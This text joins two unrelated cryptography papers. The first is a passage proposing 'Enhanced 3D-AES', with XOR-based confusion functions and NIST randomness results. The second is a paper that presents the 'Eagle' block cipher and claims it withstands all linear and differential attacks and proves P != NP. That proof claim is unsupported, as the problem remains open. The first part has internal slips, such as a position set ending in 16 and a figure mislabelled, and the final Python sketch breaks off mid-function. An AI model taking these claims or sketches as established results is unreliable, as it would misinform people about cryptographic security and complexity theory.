In the quantum cryptography research done by Hu and Kais [8], confusion provides a complex relation between the ciphertext and the key. If the attacker analyses the patterns in the ciphertext, the key properties are hard to deduce. In their proposed design, confusion is defined in terms of the statistics of measuring one qubit in the ciphertext state, which depend on multiple parts of the key, as the ciphertext cannot be measured deterministically.

In the image encryption research by Kumar et al. [9], pixels of one channel are XORed with pixels of another channel with an intelligent mix of sub-keys, to make the encryption process more dependent on confusion and more sensitive to the encryption key. Confusion is able to generate more complex ciphertext that depends on the original message and several parts of the key. A cryptographic model that uses an arbitrary key for the initial condition and control parameters, and so does not depend on an external random key used for encryption, allows the attacker to generate the keystream using a plaintext attack.

Another new image encryption algorithm, based on chaotic cryptography and multiple stages of confusion and diffusion, has been proposed by Maryoosh et al. [10]. To obtain the encrypted image, the confusion process starts by performing an XOR operation between the two results from permuted images, subtracting a random value from all pixels of the image, and using the Lorenz key. Based on the security analysis tests that have been done, the proposed algorithm is resistant to different types of attacks.

The aim of confusion is to make it very hard to find the key even if one has a large number of plaintext-ciphertext pairs produced with the same key. These studies show that an algorithm which includes a confusion component could enrich the security, sensitivity, and robustness of the model. Hence, to tackle the major randomness issue in the SKA data category, the 3D-AES algorithm is proposed to be injected with other confusion functions to enhance its security level, especially its sensitivity to changes in the 128-bit key.

3.2 Proposed Design of Confusion-Based Functions
Two new functions based on the confusion method are introduced. These confusion-based functions are adapted from previous studies that use the XOR operation as the confusion component in their algorithm design, to add properties of randomness or, in other words, to increase the level of security of the data against a known-plaintext attack to find the key. The new confusion functions for the plaintext and the key are denoted ConfuseP and ConfuseK respectively. The new proposed confusion functions are added at the beginning of the encryption process. The differences between the encryption process of the initial 3D-AES and the Enhanced 3D-AES are shown in Fig. 3.
Fig. 3. Comparison between 3D-AES and enhanced 3D-AES encryption process
3.3 ConfuseP
The plaintext of 3D-AES is a cubic structure with a block size of 512 bits, as illustrated in Fig. 4. The 512-bit block is divided into 64 sub-blocks of 8 bits each. The 64 sub-blocks are arranged according to the position numbers shown in Fig. 5.
Fig. 4. Cubic structure of 3D-AES plaintext
Fig. 5. Position number of 64 sub-block 3D-AES plaintext
The modification of the plaintext begins by performing an XOR operation between the plaintext, axyz, and its position number, X. This process is named the ConfuseP function and it is defined as axyz ⊕ X, where x = Slice number = {0, 1, 2, 3}, y = Row number = {0, 1, 2, 3}, z = Column number = {0, 1, 2, 3}, and X = Position number = {0, 1, …, 63}. Below are some examples of the ConfuseP function:
• The plaintext at position a000 will be XORed with the position number ‘0’, a000 ⊕ 0
• The plaintext at position a033 will be XORed with the position number ‘15’, a033 ⊕ 15
• The plaintext at position a303 will be XORed with the position number ‘51’, a303 ⊕ 51
Figure 6 shows the pseudocode for the ConfuseP function. These additional lines of code are inserted before the addRoundKey function.
Fig. 6. Pseudocode for ConfuseP function
Figure 7 illustrates the flowchart of the ConfuseP function. The output of this function, output_a will be the input of the addRoundKey function.
Fig. 7. Flowchart for ConfuseP function
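The ConfuseP step can be sketched in Python as below. The position number is taken as X = 16x + 4y + z, which is inferred from the three examples given in the text (a000 with 0, a033 with 15, a303 with 51); the actual layout is defined by Fig. 5 and the pseudocode in Fig. 6, which are not reproduced here, so this mapping and the function name `confuse_p` are assumptions.

```python
def confuse_p(cube):
    """XOR every byte a[x][y][z] of a 4x4x4 cube with its position number.

    Assumed position number: X = 16*x + 4*y + z, giving values 0..63.
    """
    return [
        [
            [cube[x][y][z] ^ (16 * x + 4 * y + z) for z in range(4)]
            for y in range(4)
        ]
        for x in range(4)
    ]


# With an all-zero plaintext, the output simply shows the position numbers.
zero_cube = [[[0] * 4 for _ in range(4)] for _ in range(4)]
output_a = confuse_p(zero_cube)
```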
3.4 ConfuseK
The key of 3D-AES has a block size of 128 bits, as illustrated in Fig. 8. The 128-bit block is divided into 16 sub-blocks of 8 bits each. The 16 sub-blocks are arranged according to the position numbers shown in Fig. 9.
Fig. 8. Structure of 16 sub-block 3D-AES key
Fig. 9. Position number of 16 sub-block 3D-AES key
The modification on the key begins by performing an XOR operation between the key, bxy and its position number, Y . This process is named as ConfuseK function and it can be defined as, bxy ⊕ Y , where, x = Row number = {0, 1, 2, 3}, y = Column number = {0, 1, 2, 3}, and Y = Position number = {0, 1, ….,15, 16}. Below are some of the examples of ConfuseK function: • The key at position a00 will be XOR with the position number ‘0’, a00 ⊕ 0 • The key at position a30 will be XOR with the position number ‘12’, a30 ⊕ 12 • The key at position a33 will be XOR with the position number ‘15’, a33 ⊕ 15 Figure 10 shows the pseudocode for ConfuseP function. These additional lines of codes are inserted before the key generation process, rotationKey function. Figure 11 illustrates the flowchart of the ConfuseK function. The output of this function, output_b will be the input of the rotationKey function.
Fig. 10. Pseudocode for ConfuseK function
Fig. 11. Flowchart for ConfuseK function
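As with ConfuseP, the pseudocode of Fig. 10 is not available in this text. The sketch below illustrates ConfuseK under the assumption that the position number is Y = 4·row + column, which matches the examples (row 3, column 0 gives 12; row 3, column 3 gives 15). The function name and the `bytes` layout are hypothetical.

```python
def confuse_k(key: bytes) -> bytes:
    """XOR each of the 16 key sub-blocks with its position number (0..15).

    `key` is assumed to hold the sub-blocks in position order,
    i.e. index = 4 * row + column.
    """
    if len(key) != 16:
        raise ValueError("expected a 128-bit key (16 sub-blocks)")
    return bytes(sub_block ^ pos for pos, sub_block in enumerate(key))
```

For an all-zero key the output is simply the sequence of position numbers, which makes the effect of the function easy to see.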
3.5 ConfuseP−1 and ConfuseK−1
Enhanced 3D-AES consists of an encryption scheme and a decryption scheme. For encryption, ConfuseP and ConfuseK are the proposed functions that have been injected into the initial 3D-AES design. The inverse functions of ConfuseP and ConfuseK, denoted ConfuseP−1 and ConfuseK−1 respectively, are designed to be injected into the Enhanced 3D-AES decryption scheme. In the initial 3D-AES decryption scheme, the invSliceRotate and invMixColumn functions are used as the inverses of the SliceRotate and MixColumn functions. Figure 12 compares the 3D-AES and Enhanced 3D-AES decryption process flows. Both new inverse functions are added at the beginning of the decryption process. Like the functions proposed for the encryption process, ConfuseK−1 and ConfuseP−1 are confusion-based functions that use XOR operations as the confusion components. As in ConfuseK, the 128-bit key is the input of the ConfuseK−1 function. However, whereas ConfuseP takes the 512-bit plaintext as input, ConfuseP−1 takes the 512-bit ciphertext as input.
Fig. 12. Comparison between 3D-AES and enhanced 3D-AES decryption process
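The source does not list the inverse functions explicitly. One natural reading, assuming the same position numbers X and Y are used in both directions, is that each inverse is the same XOR again, since XOR with a fixed value undoes itself:

```latex
\[
(a_{xyz} \oplus X) \oplus X = a_{xyz} \oplus (X \oplus X) = a_{xyz} \oplus 0 = a_{xyz},
\qquad
(b_{xy} \oplus Y) \oplus Y = b_{xy}.
\]
```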
4 Randomness Testing on Enhanced 3D-AES
The effectiveness of the new method can only be confirmed experimentally. Hence, the randomness analysis is re-conducted on Enhanced 3D-AES using the same techniques and processes that were applied to the initial 3D-AES block cipher, but with new testing data sequences. All randomness analysis results for Enhanced 3D-AES from the NIST Statistical Test Suite, based on seven data categories, are presented. The maximum number of rejections is pre-computed from a 0.1% significance level and 1000 samples. If the number of rejected sequences is less than the pre-computed maximum number of rejected sequences, the result is “PASS”; otherwise, the result is “FAIL”.
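The text does not state how the maximum number of rejections is computed. A common choice, assumed here, is the three-sigma proportion rule described in the NIST SP 800-22 documentation: with significance level α and s samples, the rejection count should not exceed s(α + 3·sqrt(α(1 − α)/s)). The sketch below evaluates that bound; the function names are hypothetical.

```python
import math


def rejection_bound(alpha: float, samples: int) -> float:
    """Upper bound on rejected sequences under the assumed three-sigma rule."""
    return samples * (alpha + 3 * math.sqrt(alpha * (1 - alpha) / samples))


def verdict(rejected: int, alpha: float = 0.001, samples: int = 1000) -> str:
    """Return "PASS" when the rejection count stays within the bound."""
    return "PASS" if rejected <= rejection_bound(alpha, samples) else "FAIL"
```

Under this assumption, a 0.1% significance level with 1000 samples gives a bound just below 4, so a category passes a test with at most 3 rejected sequences.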
5 Discussion on Test Results
This section explains the test results for Enhanced 3D-AES based on the Plaintext Ciphertext Correlation (PCC), Strict Key Avalanche (SKA), Cipher Block Chaining Mode (CBCM), Strict Plaintext Avalanche (SPA), Random Plaintext Random Key (RPRK), High Density Key (HDK), and Low Density Key (LDK) data categories. Based on the test results obtained in the previous section, all testing data sequences generated for the seven distinct data categories (SKA, PCC, SPA, RPRK, CBCM, HDK, and LDK) pass all 15 NIST statistical tests. The comparison between the test results of 3D-AES and Enhanced 3D-AES is given in Fig. 13.
Fig. 13. Comparison table for test results of randomness analysis on 3D-AES and enhanced 3D-AES
From the comparison table, it can be seen that Enhanced 3D-AES produces better results than the initial design of 3D-AES. Previously, the SKA data category failed almost all statistical tests in the NIST Statistical Test Suite. After the modification of the design, both the SKA and SPA data categories pass all 15 NIST statistical tests. These results indicate that the output sequence of Enhanced 3D-AES is sufficiently sensitive to changes in the 128-bit key as well as to changes in the 512-bit plaintext. For the CBCM data category, the output sequence of 3D-AES failed the Block Frequency test, but after the modification it passes this test. This result shows that the numbers of ones and zeros in each of the non-overlapping blocks created from the sequence appear to be randomly distributed. For the RPRK data category, the output sequence of 3D-AES failed two statistical tests, the Binary Matrix Rank and Longest Run of Ones tests. After the modification of the initial algorithm, both tests are passed. These passing results indicate that the longest run of ones within the tested sequence is consistent with the longest run of ones expected in a random sequence, and that no linear dependence is detected among the fixed-length substrings of the original sequence. Another data category that failed a statistical test on 3D-AES is the HDK data category, whose output sequence failed the Random Excursions Variant test. The modified version of the algorithm passes this test. This positive result indicates that no significant deviation is detected from the expected distribution of the number of visits of a random walk to a given state.
6 Conclusion and Future Research
From the randomness test results based on the SKA, PCC, SPA, RPRK, CBCM, HDK, and LDK data categories, it can be concluded that Enhanced 3D-AES is able to produce a random sequence of ciphertext. The SKA, CBCM, RPRK, and HDK data categories, which previously failed NIST statistical tests on 3D-AES, now pass all tests. These positive test results indicate that Enhanced 3D-AES is a better version of 3D-AES in terms of producing random output, where randomness is a fundamental element in designing a new block cipher, especially one with an SPN-based design structure. As the current research focuses only on randomness tests of Enhanced 3D-AES, more extensive security testing against cryptanalytic attacks should be performed to evaluate the strength of the proposed algorithm. Common security analyses that have been applied to other block cipher algorithms include differential cryptanalysis, linear cryptanalysis, impossible differential, related-key, integral, boomerang, square, and meet-in-the-middle attacks.
A Proof of P != NP: New Symmetric Encryption Algorithm Against Any Linear Attacks and Differential Attacks
Gao Ming
YingXiang Inc., TianFu New Area, Sichuan, China
[email protected]
Abstract. The P vs NP problem is the most important unresolved problem in the field of computational complexity. Its impact reaches all aspects of algorithm design, especially in the field of cryptography. The security of cryptographic algorithms based on short keys depends on whether P is equal to NP. Cryptographic algorithms used in practice are all based on short keys, and the security of the short-key mechanism ultimately rests on the “one-way” assumption, that is, the assumption that a one-way function exists. In fact, the existence of a one-way function leads directly to the important conclusion P != NP. In this paper, we construct a new short-key block cipher algorithm. The core feature of this algorithm is that, for any block, when a plaintext-ciphertext pair is known, any key in the key space can satisfy the plaintext-ciphertext pair; that is, for each block, the plaintext-ciphertext pair and the key are independent, and independence between blocks is also easy to construct. This feature is completely different from all existing short-key cipher algorithms. Based on this feature, we construct a problem and theoretically prove that it satisfies the properties of one-way functions, thereby solving the problem of the existence of one-way functions, that is, directly proving that P != NP.
Keywords: P vs NP · One-Way Function · Linear Attacks · Differential Attacks
1 Introduction
Cryptography is one of the most important applications in the field of communication and computer science. In recent years, with its adoption in commerce, enterprises, banks, and other sectors, cryptography has developed rapidly. Especially after Shannon put forward the mathematical analysis of security in “Communication theory of secrecy systems” [1], various design tools for cipher algorithms and corresponding attack tools have been developed one after another. Among them, the most common attack methods are linear attacks and differential attacks. The linear attack was first proposed by M. Matsui [2]; it is an attack method that is currently applicable to almost all block encryption algorithms. B. S. Kaliski [3] proposed a multi-linear attack based on the linear attack, but the multi-linear attack has many limitations. A. Biryukov [4], J. Y. Chao [5], and others further improved the framework of multi-linear attacks, giving linear attacks a wider range of application. The differential attack method was first proposed by Eli Biham [6]. E. Biham [7] extended it to a more powerful attack method. Tsunoo [8] further constructed multiple attack methods. These attack methods demand considerable skill in the attack process and are worthy of in-depth study.
In this paper, we first design a new encoding algorithm, which we name Eagle. The feature of the Eagle algorithm is that its output, for the same input and the same parameters, is completely random. Based on the Eagle encoding algorithm, we design a new symmetric block cipher algorithm. With this cipher algorithm, for any block of a plaintext-ciphertext pair and for any key in the key space, a suitable encryption method can be found. That is to say, there is no specific mathematical relationship between the plaintext, key, and ciphertext in each block, which shows a completely random property. It can also be understood as follows: for any plaintext encrypted with the same key every time, the ciphertext obtained is not uniquely determined, but completely random in the possible ciphertext space. This feature makes the cipher algorithm resistant to all forms of linear attacks and differential attacks. At the end of this paper, we further construct a new cipher system. Under this cipher system, if any plaintext-ciphertext pair is known, an attacker who wants to guess the possible correct key cannot do so in polynomial time. We prove theoretically that this kind of problem satisfies the properties of one-way functions, that is, we theoretically prove that one-way functions exist, so that P != NP.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 589–601, 2023. https://doi.org/10.1007/978-3-031-28073-3_41
2 Introduction to Eagle Encoding Algorithm
We first introduce two common bit operations. XOR is denoted as $\oplus$. The left cyclic shift of $D$ by $n$ bits is denoted as $D^{+n}$; for example, $(1001101)^{+2} = (0110110)$. We select two L-bit parameters $w_0$ and $w_1$ that differ in an odd number of bits. For example, 11010011 and 10100101 differ in 5 bits (5 is odd).
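The two bit operations can be sketched in Python as follows, treating an L-bit string as a non-negative integer. The function names `rotl` and `differing_bits` are hypothetical and chosen only for this illustration.

```python
def rotl(value: int, n: int, width: int) -> int:
    """Left cyclic shift of a `width`-bit integer by n positions (D^{+n})."""
    n %= width
    mask = (1 << width) - 1
    return ((value << n) | (value >> (width - n))) & mask


def differing_bits(a: int, b: int) -> int:
    """Number of bit positions in which a and b differ."""
    return bin(a ^ b).count("1")
```

Both worked examples from the text can be reproduced with these helpers: shifting 1001101 by two positions, and counting the differing bits of 11010011 and 10100101.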
We denote the L-bit initial state as $S_0$ and choose one of the parameters $w_0$ or $w_1$. Without loss of generality, assume that we choose $w_0$; then we define the following calculation:
$S_1 = w_0 \oplus S_0 \oplus S_0^{+1}$ (1)
From (1), we can easily see that
$S_0 \oplus S_0^{+1} = S_1 \oplus w_0$ (2)
If we know only $S_1$ and do not know whether $w_0$ or $w_1$ was used in (1), we can find out through a simple trial-and-error. For example, if we guess that the parameter $w_1$ was used in (1), we need to find some $S_x$ that satisfies
$S_x \oplus S_x^{+1} = S_1 \oplus w_1$ (3)
In fact, since $w_0$ and $w_1$ differ in an odd number of bits, such an $S_x$ does not exist. See Theorem 1 for details.
[Theorem 1]. Choose arbitrarily two L-bit parameters $w_0$ and $w_1$ that differ in an odd number of bits. For arbitrary $S_0$, set $S_1 = w_0 \oplus S_0 \oplus S_0^{+1}$. Then there does not exist $S_x$ satisfying $S_x \oplus S_x^{+1} = S_1 \oplus w_1$.
Proof: First, by definition, $S_1 \oplus w_1 = w_0 \oplus S_0 \oplus S_0^{+1} \oplus w_1 = S_0 \oplus S_0^{+1} \oplus (w_0 \oplus w_1)$, where $w_0$ and $w_1$ differ in an odd number of bits, so the bit string $w_0 \oplus w_1$ contains an odd number of 1s. Suppose there is an $S_x$ satisfying $S_x \oplus S_x^{+1} = S_1 \oplus w_1$. Then $S_x \oplus S_x^{+1} = S_0 \oplus S_0^{+1} \oplus (w_0 \oplus w_1)$, and a simple calculation gives $(S_0 \oplus S_x) \oplus (S_0 \oplus S_x)^{+1} = w_0 \oplus w_1$. Set $S_y = S_0 \oplus S_x$; then the bit string $S_y \oplus S_y^{+1}$ contains an odd number of 1s. Without loss of generality, suppose that the positions of these 1s are $l_1, l_2, \ldots, l_u$ ($u$ is odd). Compared with the first bit of $S_y$, bit $l_1 + 1$ of $S_y$ is different, bit $l_2 + 1$ is the same, bit $l_3 + 1$ is different, bit $l_4 + 1$ is the same, and so on. Since $u$ is odd, bit $l_u + 1$ of $S_y$ is different from the first bit of $S_y$. By the definition of the cyclic shift, we conclude that the first bit of $S_y$ is different from the first bit of $S_y$, which is a contradiction. So there does not exist $S_x$ satisfying $S_x \oplus S_x^{+1} = S_1 \oplus w_1$.
Returning to the earlier discussion: after one trial-and-error, we can determine exactly which parameter ($w_0$ or $w_1$) was used in (1). Now suppose that there is a binary sequence $M = b_1 b_2 \ldots b_L$ of length L. Starting with $S_0$, read each bit of M from left to right. When the bit $b_i$ ($1 \le i \le L$) is 0, we set $S_i = w_0 \oplus S_{i-1} \oplus S_{i-1}^{+1}$; when the bit $b_i$ is 1, we set $S_i = w_1 \oplus S_{i-1} \oplus S_{i-1}^{+1}$. According to the above calculation, for every $S_i$ we can find the only $w_x$ ($w_0$ or $w_1$) such that there exists $S_{i-1}$ satisfying $S_{i-1} \oplus S_{i-1}^{+1} = S_i \oplus w_x$.
According to the properties of XOR and cyclic shift, there are only two values of $S_{i-1}$ that satisfy $S_{i-1} \oplus S_{i-1}^{+1} = S_i \oplus w_x$, and these two values differ in every bit. As long as we know any one bit of $S_{i-1}$, $S_{i-1}$ is uniquely determined. So we only need to save any one bit of $S_i$; from $S_L$, we can then completely restore the original state $S_0$ and the binary sequence M. Based on the above discussion, we can construct a complete Eagle encoding and decoding algorithm. The entire algorithm consists of three processes: generating parameters, encoding, and decoding.
[Parameter Generation] First we choose two L-bit parameters $w_0$ and $w_1$ that differ in an odd number of bits, then we choose an L-bit initial state $S_0$.
[Encoding]
For input data M, we write $M[i]$ ($1 \le i \le L$) for the i-th bit of M, $M[i] \in \{0, 1\}$, where L is the length of M. The encoding process is as follows.
[E1] Execute E2 to E4 with i from 1 to L.
[E2] If $M[i] = 0$, set $S_i = w_0 \oplus S_{i-1} \oplus S_{i-1}^{+1}$.
[E3] If $M[i] = 1$, set $S_i = w_1 \oplus S_{i-1} \oplus S_{i-1}^{+1}$.
[E4] Set the last bit of $S_i$ as the i-th bit of C, $C[i] = S_i[L]$.
[E5] Use $(C, S_L)$ as the output.
[Decoding]
The output $(C, S_L)$ of the above encoding process is used as the input of the decoding process. The decoding process is as follows.
[D1] Execute D2 to D4 with i from L to 1.
[D2] Do trial-and-error testing with $S_i \oplus w_0$ and $S_i \oplus w_1$ to find the unique $w_x$ ($x = 0$ or $x = 1$) for which some $S_x$ satisfies $S_x \oplus S_x^{+1} = S_i \oplus w_x$.
[D3] After D2, use x as the i-th bit of M, $M[i] = x$.
[D4] Of the two possible $S_x$ satisfying $S_x \oplus S_x^{+1} = S_i \oplus w_x$ in D2, take the one whose last bit is equal to $C[i]$ as $S_{i-1}$.
[D5] Use M as the output.
It is not difficult to see that the above encoding and decoding processes are correct, that is, M can be completely restored through the decoding process from the $(C, S_L)$ generated by encoding M. In addition, the encoding process runs sequentially in the order of M’s bits, and the decoding process runs sequentially in the reverse order of C’s bits:
$S_0 \xrightarrow{m_1} S_1 \xrightarrow{m_2} S_2 \rightarrow \cdots \xrightarrow{m_L} S_L$
$S_0 \xleftarrow{c_1} S_1 \xleftarrow{c_2} S_2 \leftarrow \cdots \xleftarrow{c_L} S_L$
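The encoding and decoding steps can be sketched in Python as below. This is an illustrative sketch, not the author's implementation: states are integers whose least significant bit is taken as the "last bit", all function names are hypothetical, and, as a labeled assumption, the recorded bit C[i] is the last bit of the state before step i (S_{i-1}) so that step D4 can select S_{i-1} directly, whereas E4 as printed takes the bit from S_i.

```python
def rotl1(value: int, width: int) -> int:
    """Left cyclic shift by one bit of a `width`-bit integer."""
    return ((value << 1) | (value >> (width - 1))) & ((1 << width) - 1)


def solve(target: int, last_bit: int, width: int):
    """Return y with y ^ rotl1(y) == target whose last bit is `last_bit`.

    Returns None when no such y exists, which (Theorem 1) happens
    exactly when `target` contains an odd number of 1s.
    """
    y = prev = last_bit
    for k in range(1, width):
        prev ^= (target >> k) & 1   # bit k of y = bit k of target ^ bit k-1 of y
        y |= prev << k
    return y if (y ^ rotl1(y, width)) == target else None


def encode(message: list[int], w0: int, w1: int, s0: int, width: int):
    """Steps E1-E5; returns (C, S_L)."""
    state, c = s0, []
    for bit in message:
        c.append(state & 1)         # assumption: last bit of the pre-step state
        state = (w1 if bit else w0) ^ state ^ rotl1(state, width)
    return c, state


def decode(c: list[int], s_final: int, w0: int, w1: int, width: int):
    """Steps D1-D5; returns (M, S_0)."""
    state, message = s_final, []
    for c_bit in reversed(c):
        for x, w in ((0, w0), (1, w1)):          # D2: trial-and-error on w0, w1
            previous = solve(state ^ w, c_bit, width)
            if previous is not None:
                message.append(x)                # D3
                state = previous                 # D4
                break
        else:
            raise ValueError("w0 and w1 must differ in an odd number of bits")
    message.reverse()
    return message, state
```

With the example parameters 11010011 and 10100101 and any 8-bit initial state, decoding the output of `encode` returns the original message and initial state.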
We also note that in the above encoding and decoding processes, $S_0$ does not need to appear in any input or output. This means that the selection of $S_0$ does not affect the correctness of the encoding and decoding processes. The arbitrariness of $S_0$ brings uncertainty to the encoded output. For the convenience of the discussion in the following chapters, we briefly analyze here the effect of the uncertainty of $S_0$ on the encoded output. Given parameters $w_0$ and $w_1$ that differ in an odd number of bits, and a certain L-bit input M, it is obvious that C is uncertain because $S_0$ is arbitrarily selected; but is the final state $S_L$ necessarily uncertain? In fact, the answer is no. In some cases, such as $L = 2^u$ (that is, the parameter length is a power of 2), the final state $S_L$ is the same for every choice of $S_0$. The final state $S_L$ output by the encoding process depends only on the input M and has nothing to do with the choice of the initial state $S_0$. See Theorem 2 for details.
[Theorem 2]. In Eagle encoding, given L-bit parameters $w_0$ and $w_1$ that differ in an odd number of bits, and a certain L-bit input M, if $L = 2^u$ is satisfied, then for any initial state $S_0$, the final state $S_L$ after the Eagle encoding process depends only on the input M and is independent of the choice of the initial state $S_0$.
Proof: We represent M as the binary stream $x_1 x_2 \ldots x_L$, where $x_i \in \{0, 1\}$, $1 \le i \le L$. We execute the Eagle encoding process on M from $x_1$ to $x_L$ as follows.
$S_1 = w_{x_1} \oplus S_0 \oplus S_0^{+1} = f_1(w_{x_1}) \oplus S_0 \oplus S_0^{+1}$
$S_2 = w_{x_2} \oplus S_1 \oplus S_1^{+1} = f_2(w_{x_1}, w_{x_2}) \oplus S_0 \oplus S_0^{+2}$
$S_3 = w_{x_3} \oplus S_2 \oplus S_2^{+1} = f_3(w_{x_1}, w_{x_2}, w_{x_3}) \oplus S_0 \oplus S_0^{+1} \oplus S_0^{+2} \oplus S_0^{+3}$
$S_4 = w_{x_4} \oplus S_3 \oplus S_3^{+1} = f_4(w_{x_1}, w_{x_2}, w_{x_3}, w_{x_4}) \oplus S_0 \oplus S_0^{+4}$
It is not difficult to see that for any $m = 2^v$, $S_m = f_m(w_{x_1}, \ldots, w_{x_m}) \oplus S_0 \oplus S_0^{+m}$ holds; this can be proved by a simple mathematical induction. The conclusion is correct for $v = 1$. Assume that the conclusion is correct for $v - 1$, so that $S_{m/2} = f_{m/2}(w_{x_1}, \ldots, w_{x_{m/2}}) \oplus S_0 \oplus S_0^{+m/2}$. Since going from $S_{m/2}$ to $S_m$ takes another $m/2$ steps, we have
$S_m = f_m(w_{x_1}, \ldots, w_{x_m}) \oplus S_0 \oplus S_0^{+m/2} \oplus S_0^{+m/2} \oplus S_0^{+m} = f_m(w_{x_1}, \ldots, w_{x_m}) \oplus S_0 \oplus S_0^{+m}$.
Since $L = 2^u$, we have $S_L = f_L(w_{x_1}, \ldots, w_{x_L}) \oplus S_0 \oplus S_0^{+L}$, where $f_i(\ldots)$ does not depend on $S_0$. By the definition of the cyclic shift, $S_0^{+L} = S_0$, so $S_L = f_L(w_{x_1}, \ldots, w_{x_L})$ does not depend on $S_0$.
From Theorem 2, for any parameters $w_0$ and $w_1$ of length $L = 2^u$ and any initial state $S_0$, executing Eagle encoding on M yields an $S_L$ that does not depend on $S_0$. To simplify the description in the following chapters, we introduce the symbols $\xi$ and $\zeta$.
$\xi_{w_0,w_1}: (S_0, M) \Rightarrow (S_1, C)$: use the key $w_0, w_1$ to execute Eagle encoding ([E1]-[E5]) on the initial state $S_0$ and the input M to obtain C and $S_1$.
$\zeta_{w_0,w_1}: (S_1, C) \Rightarrow (S_0, M)$: use the key $w_0, w_1$ to execute Eagle decoding ([D1]-[D5]) on C and $S_1$ to obtain $S_0$ and M.
In all the following chapters of this paper, we assume the length L is a power of 2.
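Theorem 2 can be checked by brute force for small lengths. The sketch below, with hypothetical function names, runs the encoding recurrence for every possible initial state and collects the distinct final states; for a power-of-two length only one final state should remain, while a length such as 6 is included only as a contrast.

```python
def rotl1(value: int, width: int) -> int:
    """Left cyclic shift by one bit of a `width`-bit integer."""
    return ((value << 1) | (value >> (width - 1))) & ((1 << width) - 1)


def final_state(message: list[int], w0: int, w1: int, s0: int, width: int) -> int:
    """Apply S_i = w_{M[i]} xor S_{i-1} xor S_{i-1}^{+1} for every bit of M."""
    state = s0
    for bit in message:
        state = (w1 if bit else w0) ^ state ^ rotl1(state, width)
    return state


def final_states(message: list[int], w0: int, w1: int, width: int) -> set[int]:
    """Set of final states reached over all 2**width initial states."""
    return {final_state(message, w0, w1, s0, width) for s0 in range(1 << width)}
```

For width 8 the returned set has a single element for every message tried, in line with the theorem; for width 6 the final state still varies with the initial state.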
3 Eagle Encryption Algorithm
The core idea of the Eagle encryption algorithm comes from the Eagle encoding process. If we use the parameters $w_0$ and $w_1$ of the Eagle encoding process as encryption keys, the process of encoding the input can be regarded as the process of encrypting the plaintext, and the output $(Output, S_n)$ can be used as ciphertext. In fact, we can introduce uncertainty into the initial state $S_0$ without affecting the correctness of the decoding process. We will see later that this uncertainty allows us to design a more secure encryption system. Next, we introduce the Eagle encryption algorithm in detail. The entire Eagle encryption algorithm is divided into three processes: key generation, encryption, and decryption.
3.1 Eagle Key Generator
First, the key is chosen completely at random and must be shared between the encryptor and the decryptor. Since $w_0$ and $w_1$ must differ in an odd number of bits, only $2^{2L-1}$ of the strings of bit length $2L$ are effective keys; one bit is lost. That is, in the Eagle encryption algorithm, the number of key bits is always odd. We randomly generate a number of bit length $2L$ and take the first L bits as $w_0$. When the next L bits differ from $w_0$ in an odd number of bits, we take them directly as $w_1$; when the next L bits differ from $w_0$ in an even number of bits, we take them with the last bit inverted as $w_1$.
3.2 Eagle Encryption Process
For the $(2L-1)$-bit key $w_0$ and $w_1$ and the plaintext M, the Eagle encryption process is as follows:
[M1] The plaintext M is grouped by L bits, and a last group with fewer than L bits is randomly filled up to L bits. The total number of groups is assumed to be T, and the grouped plaintext M is written as $M_1, M_2, \ldots, M_T$.
[M2] We randomly generate two numbers: the initial state $S_0$ and a random group $M_{T+1}$ that is appended to $M_1, M_2, \ldots, M_T$.
[M3] Calculate from the first group to group $T+1$. For the first group $M_1$, the start state is $S_0$; after the encoding of [E1]-[E5], the state becomes $S_1$ and the encoded data is $C_1$ (each bit of $C_1$ is the last bit of an intermediate state), which is written as $\xi_{w_0,w_1}: (S_0, M_1) \Rightarrow (S_1, C_1)$. Then we reset the state $S_1$ to $S_1 = S_1 \oplus C_1$. For the second group $M_2$, the start state is $S_1$; after the encoding of [E1]-[E5], the state becomes $S_2$ and the encoded data is $C_2$, which is written as $\xi_{w_0,w_1}: (S_1, M_2) \Rightarrow (S_2, C_2)$; then we reset $S_2 = S_2 \oplus C_2$. After $T+1$ groups, the final state is $S_{T+1}$, and the encoded data of the groups is $C_1, C_2, \ldots, C_{T+1}$.
[M4] Output $C_1 C_2 \ldots C_{T+1} S_{T+1}$ as ciphertext.
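The key generation rule of Sect. 3.1 can be sketched as follows. The function name `generate_key` is hypothetical, and Python's `secrets` module is used here merely as one convenient source of random bits; the source does not prescribe a particular generator.

```python
import secrets


def generate_key(width: int) -> tuple[int, int]:
    """Draw 2*width random bits and split them into (w0, w1).

    If the two halves differ in an even number of bits, the last bit of
    the second half is inverted so that w0 and w1 differ in an odd number.
    """
    raw = secrets.randbits(2 * width)
    w0 = raw >> width                      # first `width` bits
    w1 = raw & ((1 << width) - 1)          # next `width` bits
    if bin(w0 ^ w1).count("1") % 2 == 0:
        w1 ^= 1                            # invert the last bit
    return w0, w1
```

Inverting one bit changes the number of differing positions by exactly one, which is why the adjusted pair always satisfies the odd-difference requirement.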
3.3 Eagle Decryption Process
With the same key $w_0$ and $w_1$, for the ciphertext $C_1 C_2 \ldots C_{T+1} S_{T+1}$, the Eagle decryption process is as follows:
[C1] Starting from the last group $T+1$ and moving to the first group, decrypt in sequence. For group $T+1$, we reset $S_{T+1} = S_{T+1} \oplus C_{T+1}$ and use $S_{T+1}$ and $C_{T+1}$ to execute the decoding operations [D1]-[D5] introduced in Chapter 2 to obtain the state $S_T$ and the decoded data $M_{T+1}$, which is written as $\zeta_{w_0,w_1}: (S_{T+1}, C_{T+1}) \Rightarrow (S_T, M_{T+1})$. For group T, we reset $S_T = S_T \oplus C_T$ and use $S_T$ and $C_T$ to execute the decoding operations [D1]-[D5] to obtain the state $S_{T-1}$ and the decoded data $M_T$, which is written as $\zeta_{w_0,w_1}: (S_T, C_T) \Rightarrow (S_{T-1}, M_T)$. After executing these steps down to the first group, the decoded data of the groups is $M_{T+1}, M_T, \ldots, M_1$ respectively.
[C2] Output $M_1 M_2 \ldots M_T$ as the plaintext.
Obviously, the above decryption process recovers the correct plaintext.
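The encryption steps [M1]-[M4] and decryption steps [C1]-[C2] can be put together in a small round-trip sketch. It rests on several assumptions that are not fixed by the text: each group is an L-bit integer read most significant bit first, the "last bit" of a state is its least significant bit, each ciphertext bit records the last bit of the state before the corresponding step, and the final state in the ciphertext is the one obtained after the XOR reset. All names are hypothetical.

```python
import secrets


def rotl1(value: int, width: int) -> int:
    return ((value << 1) | (value >> (width - 1))) & ((1 << width) - 1)


def solve(target: int, last_bit: int, width: int):
    """y with y ^ rotl1(y) == target and given last bit, else None."""
    y = prev = last_bit
    for k in range(1, width):
        prev ^= (target >> k) & 1
        y |= prev << k
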